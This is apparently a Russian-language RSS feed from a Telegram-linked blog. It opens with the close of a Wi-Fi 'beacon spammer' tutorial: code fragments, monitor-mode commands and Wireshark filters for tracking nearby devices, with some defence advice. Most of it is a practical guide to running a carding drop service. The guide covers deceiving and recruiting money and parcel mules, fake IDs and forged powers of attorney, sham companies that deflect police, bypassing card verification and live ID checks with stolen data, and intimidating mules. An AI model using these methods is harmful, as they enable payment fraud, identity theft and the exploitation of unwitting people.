        }
 
        delete tmpPacket; // free memory of allocated buffer
      }
 
      i += j;
    }
  }
 
  // show packet-rate each second
  if (currentTime - packetRateTime &gt; 1000) {
    packetRateTime = currentTime;
    Serial.print(&quot;Packets/s: &quot;);
    Serial.println(packetCounter);
    packetCounter = 0;
  }
}
</pre>
  <p><strong>Шаг 7: Настройка Wireshark</strong></p>
  <p>Теперь нужно открыть и настроить Wireshark, чтобы видеть реакцию устройств на созданные поддельные сети. Ранее в скрипте я указал первый канал, и, соответственно, в Wireshark нужно отслеживать трафик на том же канале.</p>
  <p>Если вы работаете в Kali Linux, выберите сетевой адаптер, который вы будете использовать, среди доступны сетевых интерфейсов, отображаемых после запуска ifconfig.</p>
  <p>Далее запустите следующую команды, чтобы переключить сетевой адаптер в режим мониторинга и установить канал 1. Ваш интерфейс должен именоваться наподобие wlan0 или wlan1. Если в вашем случае имя другое, внесите изменения в команду ниже.</p>
  <pre>sudo airmon-ng start wlan0 1
</pre>
  <p>Теперь, когда адаптер слушает канал 1, откройте Wireshark и выберите сетевой адаптер, который вы только что переключили в режим мониторинга, и активируйте перехват пакетов.</p>
  <p>Если у вас возникли сложности с Wireshark, попробуйте ознакомиться с <a href="https://null-byte.wonderhowto.com/how-to/detect-script-kiddie-wi-fi-jamming-with-wireshark-0186138/" target="_blank">этим руководством</a>.</p>
  <p><strong>Шаг 8: Поиск пробных и аутентификационных запросов</strong></p>
  <p>Совершенно очевидно, что по радиоканалам передается огромное количество данных и нам нужно настроить фильтры. Вначале воспользуемся экранным фильтром, чтобы ненужная информация не отображалась. Сейчас на вашем экране должно отображаться огромное количество информации от различных устройств, включая локальный сетевой трафик.</p>
  <p>Попробуем отфильтровать пробные запросы к поддельным сетям, которые мы создали, или попытки аутентификации. Эти запросы можно найти при помощи фильтров, показанных ниже.</p>
  <p>Чтобы найти пробные ответы, воспользуемся следующим фильтром, который нужно ввести в поле в верхней части интерфейса Wireshark:</p>
  <pre>wlan.fc.type_subtype == 0x000b
</pre>
  <p><strong>Отобразятся устройства, пытающиеся подключиться к близлежащим сетям:</strong></p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2018/76/image009.jpg" width="624" />
  </figure>
  <p><strong>Рисунок 8: Устройства, пытающиеся подключиться к поддельным сетям</strong></p>
  <p>Далее воспользуемся следующим фильтром для поиска пробных запросов:</p>
  <pre>wlan.fc.type_subtype == 0x0004
</pre>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2018/76/image010.jpg" width="624" />
  </figure>
  <p><strong>Рисунок 9: Экранный фильтр для поиска пробных запросов</strong></p>
  <p>На рисунке выше показаны близлежащие устройства, пытающиеся подключиться к определенным сетям. Здесь мы также видим дополнительную информацию, включая имя сети. Слово broadcast означает, что сообщение отсылается всем без разбора. Здесь же видно, что многие запросы отсылаются поддельным сетям.</p>
  <p><strong>Шаг 9: Фильтрация поиска по первым 3 октетам MAC адреса</strong></p>
  <p>Наилучший способ просмотра и анализа входящего и исходящего трафика от нашего устройства – фильтрация по полям «transmitter address» (адрес отправителя) и «destination address» (адрес получателя». Для просмотра пакетов, отсылаемых от устройства Beacon Spammer, мы будем фильтровать по адресу отправителя.</p>
  <p>Обратите внимание, что первые три октета MAC адреса в отсылаемых пакетах не меняются. Пользуясь этим наблюдением, создаем следующий фильтр, который будет показывать только фреймы, отсылаемые к Beacon Spammer:</p>
  <pre>wlan.da[0:3] == xx:xx:xx
</pre>
  <p>Этот фильтр отобразит все устройства, которые пытаются подключиться к группе поддельных точек доступа.</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2018/76/image011.jpg" width="624" />
  </figure>
  <p><strong>Рисунок 10: Перечень устройств, пытающихся подключиться к поддельным сетям</strong></p>
  <p>Возможности этой техники далеко не исчерпываются показанными примером. К примеру, можно фильтровать информацию по конкретному устройству. Пользуйтесь своим воображением.</p>
  <h2>Как защититься от слежки</h2>
  <p>Наиболее простой способ защиты – отключение Wi-Fi на устройстве. Однако даже в этом случае устройство, используя AGPS и GPS, может пытаться искать близлежащие сети, чтобы определить ваше местонахождение. Можно пойти более пойти более радикальным путем и отключить высокоточный GPS или переключить телефон в режим полета, если вы хотите полностью отключить утечку данных через Wi-Fi.</p>
  <p>Еще один важный и практичный метод защиты от подобного рода атак – удаление открытых сетей, сохраненных на устройстве. Функция автоподключения может оказаться полезной, особенно когда не нужно постоянно вводить пароль, но, если речь идет о свободном доступе, злоумышленник легко может найти перечень сетей, к которым подключалось ваше устройство. Этот метод не влияет на подключение к сетям, использующим WPA2, и, соответственно, удаление списка предотвратит подключение к поддельным точкам доступа.</p>
  <p><strong>Надеюсь, киберсталкеры, вам понравилась это руководство, которое было посвящено раскрытию и отслеживанию Wi-Fi устройств. На этом всё. Оставайтесь с нами, делитесь с друзьями, активнее заходите на канал <a href="https://t.me/shadowruntime" target="_blank">ShadowRun</a> и помните, безопасность, сука, решает!</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@redterror/HyMskQLmE</guid><link>https://teletype.in/@redterror/HyMskQLmE?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror</link><comments>https://teletype.in/@redterror/HyMskQLmE?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror#comments</comments><dc:creator>redterror</dc:creator><title>Как организовать дроп сервис</title><pubDate>Wed, 23 Jan 2019 17:08:42 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/15/154a9efb-5841-42d0-9880-a086c6fc55b1.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/59/5973f12d-3736-4077-af9e-651ae8ace72e.jpeg"></img>https://t.me/shadowruntime]]></description><content:encoded><![CDATA[
  <figure id="ehEK" class="m_column">
    <img src="https://teletype.in/files/59/5973f12d-3736-4077-af9e-651ae8ace72e.jpeg" width="1280" />
  </figure>
  <p id="7V1k"><a href="https://t.me/shadowruntime" target="_blank">https://t.me/shadowruntime</a></p>
  <p id="2KtS">Лекция писалась в первую очередь исходя из опыта работы сервиса в Польше! Мы делали почти все, но основной род занятий сервиса был прием посылок. Я даю лишь основу с некоторыми углублениями. Не возможно стать хорошим хирургом, перечитав тонны книжек. Практика товарищи, практика.</p>
  <h2 id="gIR9">Вступление</h2>
  <p id="tClc">Дроповодство само по себе не является легким делом, как пишут многие. Люди думают, что вести такой сервис проще простого. Надеюсь, я изменю ваш взгляд на это дело. Много раз уже встречал ситуации, когда мне пишут «пробовал развести дропа, что только не придумывал, не хотят работать ни в какую. Наверное, у меня все очень плохо с СИ». Что касаемо СИ - это конечно интересная штука, но те, кто перечитывают книжки с психологии в надежде стать крутым дроповодом, уже перегибают палку.</p>
  <p id="sDEd">Для работы с дропами, с моей точки зрения, нужно:</p>
  <ul id="TO67">
    <li id="72Fz">хорошо уметь врать</li>
    <li id="T05w">понимать, когда стоит врать, а когда нужно говорить правду</li>
  </ul>
  <p id="m81M">Лично мне этого хватает. Когда видишь человека вживую, ты уже должен понимать, что этот человек из себя являет, 5-10 минут разговоров по душам, и ты готов сделать вывод, на что этот человек готов, ну и за какую оплату он будет работать. Не буду сейчас входить в подробности того, что все равно будет описано ниже, но скажу одно. При желании, дроповодом может стать каждый. Не нужно забывать для чего мы работаем. И оплата в этом деле очень важна</p>
  <h2 id="XXiS">Локализация, как один из самых важных факторов в работе (Дроповодство в USA/EU)</h2>
  <p id="4D2q">Начать по плану я должен с работы по USA, в которой на практике я, конечно же, ничего не понимаю? Но дать какую-то часть информации могу. Если брать USA - самый большой риск тут наверно, работа по стране, в которой сидит дроп, да еще и материалом этой страны. О безопасности работы с дропами буду рассказывать ниже, для USA это тоже думаю пойдет.</p>
  <p id="9m55"><strong>По тонкостях работы: часто встречаемый способ «вытянуть» посылку в США это pickup.</strong></p>
  <p id="KtVv">Для тех, кто не знает, к пикапу прибегают в тех случаях, когда товар выслали на адрес владельца карты, использовав его карту/брученный аккаунт в интернет магазине/аукционе и т. д. В такой ситуации дроп, у которого уже есть заранее подготовленный fake id / доверенность, приезжает по адресу, указанном как «адрес доставки» и забирает посылку под видом самого КХ (с доверенностью, как родственник, друг, сосед и т. д).</p>
  <p id="5ksb">Рассказываю элементарные вещи, ибо не все тут гуру кардинга/дроповодства. Позже пойдут вещи посложней</p>
  <p id="kfn3">Не нужно думать, что услуга пикапа пользуется спросом только в странах, где действует система AVS. Например, был у меня заказ в Чехии, где с жирных (с историей, где заказы 7-10к$) брученных аккаунтов ebay заказывали дорогую электронику и украшения на адреса владельцев аккаунтов, и таким же образом успешно пикапили эти заказы. В любом случае, работать с дропами в USA намного опаснее, нежели в ЕУ.</p>
  <h2 id="lul0">Работа по EU (DE/CZ/PL)</h2>
  <p id="OcRm">Вот здесь ведется вся моя деялетльность, тут я могу рассказать вам много интересного. Как многие знают, работаю я по Польше, иногда высылая дропов в соседние страны. В большинстве причиной поездок становится пикап посылок с Amazon/Ebay, иногда забираем особо дорогие вещи, сделанные матом страны, в которую едем.</p>
  <p id="DBUj">Что касаемо сложностей работы у немцев с этим делом строже всего (так утверждают дружественные дроп сервисы). Если делать посылки матом страны - дроп падает еще до приезда посылки. Экспериментировал я с этим, делали заказы на разводных дропов с польского мата. 4/5 дропов «умирали» до приезда посылки. Судьба дропов мне не известна по сей день. Что касаемо DE и CZ - на выездах работаем хорошо, никто еще не «попал» за 2,5 месяца работы. Тут ситуация, в которой понять весь процесс можно только методом проб и ошибок. У каждого получается по-другому, вывести единую формулу не возможно. Практикуйте товарищи.</p>
  <h2 id="MnDv">Направления деятельности дропов</h2>
  <p id="YiCl">Можно привести примеры с сотни направлений, начиная от регистрации ООО, заканчивая кредитными темами/лизинговыми авто. Но здесь я сосредоточусь на 3 самых популярных темах у меня в сервисе.</p>
  <p id="wc3w">По моим наблюдениям больше всего спросом пользуются:</p>
  <ul id="aEfJ">
    <li id="HOT8">Дропы под вещевой кардинг</li>
    <li id="Ac10">Дропы под заливы</li>
    <li id="iT88">Дропы под верификацию чего либо</li>
  </ul>
  <p id="JOUm">С первым - тут думаю объяснять нечего, находишь человека, заставляешь его принять посылку за умеренную плату, конец. Что касаемо практики, на сегодняшний день, работая с толковыми (я даже не знал какое слово подобрать, чтобы передать весь интеллектуальный потенциал этих людей) вбивалами, узнал столько удивительной информации, которой раньше нигде не видел в паблике.</p>
  <p id="LxAK">К примеру, «золотые бины». В процессе вбива, когда идет запрос vbv, полностью изолируешь трафик, пускаешь пустой запрос с vbv, пускаешь дальше трафик (все это делали через плинкер/проксифаер) - и банк принимает vbv. Часы по 10 000$, украшения, iMac по 4-5к$, все это возможно.</p>
  <p id="TD8G">Я не вбивала, тонкости такого вбива вам не объясню, но я думаю вы понимаете о чем идет речь. Это баг самого банка, но такое есть. Со вторым - огромнейшее количество тонкостей и нюансов, которые тянут еще на одну лекцию. Если вы хотите работать только по этой тематике, ищите тематические форумы, пробуйте с малого, пробуйте сами заливать (хотя бы для того, чтобы понять, что происходит во время этого процесса). Все как везде.</p>
  <p id="jKCv">Что касаемо верификации - скорее всего вы подумали, что речь пойдет о верификации кошельков типа qiwi. Только вот такие кошельки продают в сети по 1-2тыс. рублей, насколько мне известно. Находясь в EU/USA, для вас это не деньги. Так почему же есть такой пункт: «Дропы под верификацию»?</p>
  <p id="cOu1">А тут все намного интересней. Совсем недавно, может 2 недели назад, я натолкнулся на интересный поток заказов по тематике верификации.</p>
  <p id="tdtq">Верификовать нужно было сервисы, в которых этот процесс выглядит следующим образом «связь - верификация - результат». В двух словах: с дропом связывается сотрудник службы верификации и в режиме онлайн трансляции задает несколько базовых вопросов на английском (рандомные), потом просит показать документ в камеру с двух сторон, ну и как вы уже догадались, лицо тоже.</p>
  <p id="7yZ3">К слову, точно такую же услугу видел сегодня на форуме. Системы Live верификации набирают популярность. Live верификация, с того что я узнавал, весьма недешевый для корпораций, но очень эффективный. Что касаемо связи, я встречал запрос по верификации через Skype и через встроенное предложение (заставляют скачать приложение на телефон, телефон привязывают к тебе и через камеру телефона ты проходишь верификацию).</p>
  <p id="VWIx">Самым популярным центром верификации в Германии на сегодняшний день является IDNOW. За успешную верификацию меньше, чем 100 евро мне еще не предлагали. К слову, верифицировали мы биржу обмена валюты в биткоины, которая позволяла пополнять себя через обычные сс&#x27;шки, и переводить пополненную сумму в BTC. Если у людей есть хороший материал, они сливают его вот в такой способ. После такой верификации проблем со снятием денег с СС у нас еще не было. Мерч списывает их почти сразу. Дроп при этом использует fake id, чтобы было совпадение по данным КХ (мерчант пробивает очень много банков ЕУ).</p>
  <h2 id="AAvk">Подбор дропов на все случаи жизни + Правила работы с д��опами</h2>
  <p id="cCQl">Первым пунктом здесь будет поиск дропов и где их искать. Лично я искал своих первых дропов через социальные сети VK.com и facebook.com. Собирал дропов способом «работа в развивающейся транспортной компании». Краткая история, что нуждаемся в складах по Европе, а сами бываем здесь только проездом. Мол принимайте посылки, а наш человек будет приезжать в ПН и ПТ, например, и забирать это все добро.</p>
  <p id="E2gs">В этом случае можно получить резюме!! дропа. Где он учится, работает. Проблем с дропом в дальнейшем обычно не возникает.</p>
  <p id="HXQ6">Почему удобно собирать людей в соц. сетях - ты видишь фотографии человека, «статусы» на его стене. Сразу станет понятно, что перед тобой за «кадр». По опыту, людей с публичными страницами типа «жизнь миллионера», «брат за брата», «хочу, а значит ��обьюсь» - не берите. Не наступайте на мои грабли. Эти люди могут быть использованные разве что под жесткую чернуху, типа обнала пластика. И то, чтобы они ничего не соображали. На сегодняшний день поиск дропов у меня автоматизированный, подробней схему опишу ниже.</p>
  <p id="zezQ">Второй пункт здесь будет о типах дроров, и какой тип лучше всего (по-моему мнению). (Изложу свою мысль конкретно для моей ситуации, для меня это удобней всего, но для вас это может совсем не подойти).</p>
  <p id="8kHt">В каком-то мануале было красиво систематизированные типы дропов. Для себя же я выделяю 3 типа. Разводной, полу разводной, неразводной.</p>
  <p id="gIcm">Все просто, объяснений много не требуется:</p>
  <ul id="DT5K">
    <li id="ioS2">Разводной не соображает, что вообще происходит</li>
    <li id="lTLj">Полу разводной понимает свои действия лишь от части, или же вообще думает, что он занимается другой деятельностью (при этом в курсе, что нелегальной)</li>
    <li id="p17g">Неразводной (Знает ровно столько, сколько ему положено. Понимает, что делает)</li>
  </ul>
  <p id="wb02">За 6 месяцев работы я не использовал ни одного неразводного дропа. Почему? Они дорого мне обходятся. Даже когда человек много знал о ситуации, в целом, все равно всей серьезности не понимал. По вещевухе у меня работают разводные + полу разводные.</p>
  <p id="xmqb">Почему они? Да элементарно, как и писал выше, из финансовых соображений. Хотят такие дропы за прием посылки в 2-4 раза меньше, чем неразводные. Для каждой ситуации нужно подбирать другого человека. Это как собирать большой пазл.</p>
  <p id="qmJm">Многие скажут, что разводные же будут терять посылки. При правильной работе с ними - проблем не возникает.</p>
  <p id="iN9d">Есть у меня парень, который работает со мной почти полгода. Время от времени балую его стаффом, на который никто не отозвался. Живет пацан, радуется жизни. Что касаемо жить в РУ, а организовать дроп сервис в ЕУ, это, как по мне, невозможно.</p>
  <p id="EPQq">Если ты лично не можешь приехать и погладить дропа по головке, они будут терять посылки, курьерки будут отдавать паки «соседям» и т. д. Благо, к физическому подходу не доходило еще ни разу. Словестно «вставить» дропу хватает. Для профилактики время от времени это нужная процедура. И теперь так. Эту часть написанного мной текста я полностью бы переписал.</p>
  <p id="XFCO">Последний месяц я взял одного дропа с З.П. 600$ и это более чем выгодно, принимает он очень много посылок. За прошлый месяц перевалило за 400 штук.</p>
  <p id="YRKC">Что теперь мне пришло в голову. Чтобы не мучаться с поиском дропов и т. д. решил создать этакого &quot;супер дропа&quot;. Все, кто работали со мной, удивляются, почему при попытке взять у меня дропа приходят сообщения типа &quot;возьми рандомное ФИО польское, рандомный адрес в Варшаве и вбивай.</p>
  <p id="ObZC">Я расскажу эти все нюансы ниже, но прикинув теоретически, если дроп будет носить с собой около 40 активных симкарт (это заменяет 40 дропов). С З.П. около 1000$ это будет очень выгодно</p>
  <p id="59vb"><strong>Что касаемо организовать дроп сервис в ЕУ(ЮСА) с СНГ.</strong></p>
  <p id="JUGw">Удивитесь, но из подполья вытянул целые схемы ведения дроповодства на основании такси UBER, схема примерно следущая: отправляете стафф на ресепшн в отель с брученных аккаунтов UBER заказываете такси, попросив забрать посылку и отвести в другое место.</p>
  <p id="9GKL">Имея только одного дропа в большом городе (в котором обычно около 50-100 отелей разных рангов) думаю можно вытянуть не мало стаффа.</p>
  <p id="FVuR">По этой теме наверное все, что хотел добавить. Идем дальше - Работа с дропами - правила безопасности (Главный дроп - работа по принципу &quot;сутенерства&quot;).</p>
  <p id="8nWC">Как бы смешно и странно это не звучало, иерархия предоставляет много удобств. Нашёл я девушку, которая хотела работать и зарабатывать, вопросов много не задавала. Я сделал её центровым в работе с дропами. Немного обучил тонкостям работы, сидит, набирает новых людей.</p>
  <p id="mA7E">Девушка моя работает как центр логистики, забрать все паки, привезти и скинуть на склад. Контролирует всех дропов в реале. И я не свечусь перед дропами.</p>
  <p id="OL7R">Что касаемо физической безопасности - я никогда не использую телефон. Назначаю встречи на конкретные часы в конкретных местах, где нету камер. Никаких «буду в красных кроссовках», «с синим рюкзаком» и т. д. Всегда нужно пройтись с дропом, поговорить с ним 5-10 минут, понять, что за человек, и будут ли с ним проблемы. Когда надо - нужно запугать. Такая работа, не сильно приятная. Как и любая работа с людьми. Припомнилась мне одна цитата из фильма, суть которой: люди должны тебя уважать. Или бояться. А лучше всего, когда страх идет вперемешку с уважением. Такие люди предоставляют меньше всего проблем.</p>
  <p id="UZTD">Что еще добавлю от себя. Первое время хранил стафф в квартире, где жил. После прихода очень большого количества стафа снял закрытый гараж за 4 км. от дома (очень не выгодно, поверьте) на сегодняшний день взял в аренду дом, подвал переделал под склад, больше чем устраивает.</p>
  <p id="UaNh"><strong>Когда к дропу пришла полиция</strong></p>
  <p id="VoJ9">Тут все предельно кратко. Мы используем договора с дропами для фирм-работодателей. Т. е. - открываем фирму, от её лица подписываем контракты на работу по приему посылок с дропом. Собираем 5-10 человек на фирму, и закрываем её. Когда приходит полиция с вопросами - дроп в недоумении - показывает договор. Фирма была такая? Была. Дроп получается жертва мошенников? Жертва. За полгода ни один дроп не пострадал (у кого были эти договора).</p>
  <p id="ioEm">Это же можно использовать для открытия фирмовых счетов в банках и другое (Дроп получил поручение от фирмы на открытие фирмового счета, а потом был уволен). Что только сможете придумать. Толковый юрист вам здесь будет очень полезен. Неплохо было бы таким обзавестись.</p>
  <p id="2Akl"><strong>Mail-forwarding фирма, как прикрытие для дроп-сервиса</strong></p>
  <p id="4bFO">Знакомый в офлайне держал такую фирму. В основном занимаясь белой деятельностью по пересылу недорогих автозапчастей в страны СНГ. Был сайт (сайт-визитка), оттуда шел поток клиентов. Время от времени приходили вещи с самых разных уголков Европы. Из которых 80% были каржем (точно сказать нельзя, но куртку из Италии за 1500 евро мало кто себе за свои кровные может позволить с пересылом в Украину на сегодняшний день).</p>
  <p id="ZzVJ">Самые топовые посылки (с apple, кожаные куртки) он просто забирал себе. Начинал просить подтверждение оплаты, твоя ли это карта, селфи получателя и документа, селфи получателя и страницы сайта и остальное в этом духе. Обычно после 3 письма люди просто переставали что-либо подтверждать.</p>
  <p id="ByOK">Кратко говоря, как и любой сервис-посредник в USA - делал то, что все, зажимал себе посылки. Было несколько случаев, когда вбивали с польского материала на его адрес. Приходит полиция на склад (адрес, на который вбили). Объясняют ситуацию, параллельно идет обыск на законных основаниях.</p>
  <p id="cPWx">Когда успевал отправлять - показывал накладные с почты, что вещи были под пересыл. Однажды посылку изъяли прямо со склада, предоставив документы от магазина. Что самое интересное, ни разу не штрафовали (!). Через него проходит много белых посылок, все официально документируется. Скорей всего из-за этого. В каждой стране по-разному. Слыхал от товарищей по ремеслу с UK, что полиция приходит и штрафует. Узнайте все нюансы на консультации с юристом в определенной стране.</p>
  <p id="Jat8">Я сам думал открыть такую фирму как прикрытие. Но скажу откровенно, много мнений услышал, и они очень спорные. Некоторые &quot;попадали&quot; с этими фирмами так, что потом платили и не мало. Некоторые работают с ними по сей день, и вполне успешно. Нужно пробовать методом проб и ошибок</p>
  <p id="COWW"><strong>Вытянуть посылку любой ценой</strong></p>
  <p id="GXoX">За все время работы у меня бывали самые разные ситуации, когда приходилось вытягивать посылку с дропа, которого забрали, например, в СИЗО (да, и такое было, спасибо умельцам бить с польского мата). Ехал пак с 2 макбуками, было бы глупо потерять такую посылку. Вот мы и подошли к самой сути этой части. Сейчас мы поговорим о способах приема посылок, и как их «вытащить» с самой дикой ситуации.</p>
  <p id="DXzQ">У нас выработались два способа приема посылок:</p>
  <p id="Ckip"><strong>Fake id</strong></p>
  <p id="iVa7">Тут все думаю понятно. Делаем/покупаем внутреннюю биометрическую карточку-паспорт любой страны (желательно конечно же Прибалтики, где часть населения говорит по-русски), дабы в критичной ситуации попросту не «облажаться». И заказывать на неё стафф (опять таки, я работаю в 95% с русскоязычными дропами, поэтому использую именно прибалтику).</p>
  <p id="twL5"><strong>Доверенности на дропов</strong></p>
  <p id="2DjG">Тоже ничего сложного. Рандомные имена, оформляем обычные доверки левые, по ним принимаем. Это касаемо &quot;принять на любое имя&quot; большинство курьеров даже не смотрят кому отдают. Но иметь не помешает. Также вытащить посылку можно через прозвон курьерской фирмы. Очень часто пользуемся этим способом. Самые разные истории от «переехал на другой адрес», до «моя матушка/дедушка выехали на отды��, а посылку попросили принять меня». Иногда не хотят менять имя, но соглашаются на изменение адреса. В этом случае можно использовать доверенности.</p>
  <p id="2nO7">Что касаемо прозвона за месяц все настолько кардинально изменилось, что этот пункт для большинства курьерок вообще можно удалить</p>
  <p id="O2b7"><strong>DHL</strong> на сегодняшний день (17-12-16) не переадресует посылку через прозвон! НИКАК. У них теперь только через письмо с почты, привязанной до заказа (что очень проблемно, когда работаешь с брутом)</p>
  <p id="lVQw"><strong>UPS/Fedex/TNT</strong> работают</p>
  <p id="gr2o"><strong>DPD</strong> - с горем пополам. Ввели функцию выборочно. Стоит не мало, но если такую галку поставили - изменить данные посылки может только отправитель</p>
  <p id="7VXF"><strong>USPS</strong> все, что отправляют, доходит до Польши DHL, поэтому больше курьерок, как таковых нету</p>
  <p id="cE6W"><strong>Дроп панель и организация работы с клиентами</strong></p>
  <p id="0J9l">Думаю, этот пункт будет многим интересен. Где достать дроп панель писать не буду, скажу только, что через мои руки проходила панелька из верифа (стоимость которой около 750/800$). Панель, скажу я вам, штука достаточно удобная. Но как по мне, она больше ориентирована на запад. Именно там её можно использовать «во всей своей красоте». На выбор есть с два десятка модулей, которые можно докупить под себя.</p>
  <p id="xnsm">Почему же я не использую дроп-панели для работы? - Нету такого большого трафика, который я не могу обработать вручную, включая то, что большинство работы делает главный дроп.</p>
  <ul id="Y9nV">
    <li id="kMf7">С панелью за время месяца тестирования вылезло куча косяков (траблы самого продукта были, возможно проблемы старой версии, но конкретно в тот момент я воздержался от перехода, и это была одна из причин)</li>
    <li id="e8LP">Я очень поздно узнал об существовании таких панелей, да и о том, что их может купить любой за 1000$.</li>
  </ul>
  <p id="E6Mu">Как-то нужно было организовать все. По сколько, как уже писал выше, не знал о дроп панелях, обрабатывал все вручную. Есть и плюсы от такой работы, например, индивидуальный подход к каждому клиенту, решение проблем еще до их возникновения, всегда знаю все за всех, что кому должно приехать и т. д. (последнее больше минус, чем плюс)</p>
  <p id="xSFW">Организовал я все на довольно примитивном уровне.</p>
  <ul id="tKt0">
    <li id="rkXZ">Контакты в жабе помечаю как [Вбивает Asos/Amazon/Ebay] nickname123@jabber.com | никнейм на форуме</li>
    <li id="ZoMk">Все треки сохраняю в браузерных закладках, и каждое утро проверяю/обновляю</li>
    <li id="ul7c">Использую Exell для ведения документации в облаке. (синхронизация, как и с командами, кто работает по амазону (добавляют новые треки, я их просто «забираю», так и с главным дропом, который отмечает посылки, которые приехали по трекам и тому подобное)</li>
  </ul>
  <p id="Dm6G">Этого хватает, чтобы не терять посылки (лично мне). При сверх большом потоке думаю эта схема начнет забирать слишком много времени/сил, но при раскладе 10 посылок в сутки - этого хватает.</p>
  <p id="iZ4J">А теперь давайте все исправлять</p>
  <p id="X72I">1. Бред я написал, что касаемо &quot;справиться&quot;. Если вы представляете, что такое 400 посылок (не мелких, типа телефоны), а та же плазма, мойка для авто, шины и т. д.</p>
  <p id="Qbhd">Когда 3 раза в неделю к тебе приезжают 2 полностью забитые под гору мерседеса спринтера, а иногда и этого не хватает, приходится ехать своей гробовозкой (универсал), чтобы довести остальное).</p>
  <p id="pN9q">Ты не то, что не справляешься ты физически не можешь это все взять в свои руки.</p>
  <p id="TVHR">2. Что касаемо Exell.</p>
  <p id="jcq3">Когда пошло большое количество посылок, физически добавить все данные в Exel самому занимает часы. Вариант подойдет на начало. Но никак не для больших оборотов.</p>
  <p id="dFYF"><strong>Принимаем посылки от Amazon. Работа с UPS/DHL (Зависимость от локации)</strong></p>
  <p id="93Wx">Амазон настолько специфичная площадка, что её везде нужно выделить отдельную тему. Что касаемо Amazon Europe - тут все просто, делают вам заказы, вы принимаете. Никаких налогов не платите, чего не скажешь о Amazon World (USA, JAPAN, CANADA и другие). При отправке товаров с этих стран в EU каждый товар облагается налогом (в среднем 20%). Это нужно учесть для любителей Refund. Амазон автоматически начисляет налог (добавляет в сумму ордера), и списывает эту сумму с вашей карты, автоматически проплачивая таможенный платеж наперед.</p>
  <p id="bERY">Чтобы принимать посылки с амазона вам будет нужно очень много адресов. Поскольку на 1 адрес больше, чем 1 посылку не выслать, а на 1 дом не больше 10 посылок не советую (дальше дом попадает в зону «рискованных»), мы используем паутинный способ приема паков под амазон. Для примера, Варшава имеет 18 районов. В каждом из этих районов у нас есть амазонный дроп. Почему отдельные дропы?</p>
  <p id="p3qY">А потому, что вытянуть заказ занимает определенное количество времени у того, кто его достает. Мы чередуем районы, в каждом районе максимум по 3 заказа на дом. В этом случае после «отлежки» 1-1,5 месяца на дом дальше можно слать (на другие квартиры разумеется). И по целому городу меняем адреса. Благо амазон не может заблокировать целый город).</p>
  <p id="3QBC">Те, кто советуют менять адрес в форме «ul. XXX 5, kv.5» и «XXX 5 street, apt. 5» еще быстрей убивает дом. Чего делать настоятельно не советуем. Бывают ситуации, когда кривляют ФИО дропов (т.е. Oleg/Oleh/Olegh, Drevneyy, Drevneiy, Drevneyi и т. д.). Пробовали так делать - это на рефы не влияет вообще никак (с того, что я вижу). Введя свое ФИО в страницу поиска фейсбука/контакта, вы увидите еще несколько человек с аналогичными данными.</p>
  <p id="2g14">А некоторые ФИО выдают по 30, 40, 200 и больше совпадений. Если «Иван Петров» сделал рефунд, все Иваны Петровы с СНГ попадают в блек лист амазона? Вряд ли. Но работайте на свое усмотрение.</p>
  <p id="2kVQ">Мобильный телефон можно указать рандомный, но заведомо неправильный. (Код страны, первые 3 цифры оператора, которые свободны 100% (например, в Польше это 321, 123, 987, 132, 362 и т. д. Целый номер для Польши выглядит так: +48 321 *** ***, где * - любое число от 0 до 9)</p>
  <p id="Jwh9">Такие посылки, где адрес, фио дропа, номер мобильного не существует, в действительности тоже можно вытянуть. При чем, это не касается только амазона, карж тоже можно принимать таким способом.</p>
  <p id="r8Ve">В UPS такие паки можно принять только по доверенностям, DHL - прозвон (информация на 2016 год, страна Польша). Для примера, DHL за последний месяц 2 раза меняло способ приема. В каждой стране по-разному должно быть.</p>
  <p id="wQMB">Здесь и спорный нюанс неделя после написания этой статьи DHL закрыл способ переадреса через телефон полностью. А все виной пикап, чтобы знали.</p>
  <p id="6diq"><strong>Принимаем посылки с USA/Canada/Asia</strong></p>
  <p id="gqmE">Многие спрашивают, реально ли слать посылки со Шта��ов, Канады, Азии в Европу, где таможенный лимит в большинства стран 22 евро. Можно слать такие паки, но нужно находить магазины, которые позволяют оплатить налог с карты КХ (живой пример тому Amazon), или же магазины, которые имеют склады в Европе.</p>
  <p id="wKt3">Хотя столкнулись с проблемой, большинство магазинов Азии и Австралия - не оплатят налог за тебя (не нашли еще ни одного магазина такого). Занизить инвойс - да. Даже занизить инвойс на телефон за 300$ до 20 евро, и обозначить как «6 чехлов, сложенных в кирпич» - и такое было. Но чтобы проплатить сразу налог - такого не видели еще.</p>
  <p id="T9fV">В USA и Канаде найти такое более чем реально. Когда вашу посылку перевозит DHL или UPS - вы иначе как переводом/наличкой оплатить налог не сможете (в 99% курьерка оплатит налог за вас, предварительно «накинув» еще 10$ за свои услуги), поэтому спрос за оплату таможенный пошлины будет брать курьерка. Ну и конечно же, мы говорим только о Польше.</p>
  <p id="qLhG">Есть страны, где налог можно оплатить через их собственный мерч (обычной сс), а даже и пейпелом. Это когда мы говорим о том, что ваша посылка встрянет на таможне, и платить нужно будет государству «напрямую». Конечно же, такое никому не советую оплачивать «чернухой». Даже не надейтесь, что ваш пак доедет (особенно если говорить о PP). Еще и дроп будет иметь серьезные проблемы, после такой «оплаты».</p>
  <p id="KgfT">Вывел в отдельный пункт еще Карж лейблы.</p>
  <p id="8pbR">Узнал я о них тоже не сильно давно. Вкратце: оплачиваешь услугу курьерской службы (перевозку посылки) каржем, тебе дают лейбл, ты его печатаешь, клеишь на свою посылку, высылаешь. Я не удивлен, что найти какую-либо информацию на счет этого было затруднительно, как и исполнителей.</p>
  <p id="6kVT">Я считаю, что это просто бред. Каким же нужно быть евреем, чтобы не оплатить 10-20 евро за доставку посылки по EU, и 30-60$ за доставку с USA (говорим о малогабаритных, не тяжелых посылках). Эта услуга имеет смысл только в том случае, когда отправляете очень тяжелый и дешевый стафф. Доставка которого дорогая, и потерять не боитесь. Тогда в этом есть смысл. Все другие варианты использования этой слуги, по крайней мере для меня, не имеют смысла. Ценник такого лейбла в районе 20$, можно найти умельцев на форумах.</p>
  <p id="9POX">Мои советы:</p>
  <ul id="NwQ2">
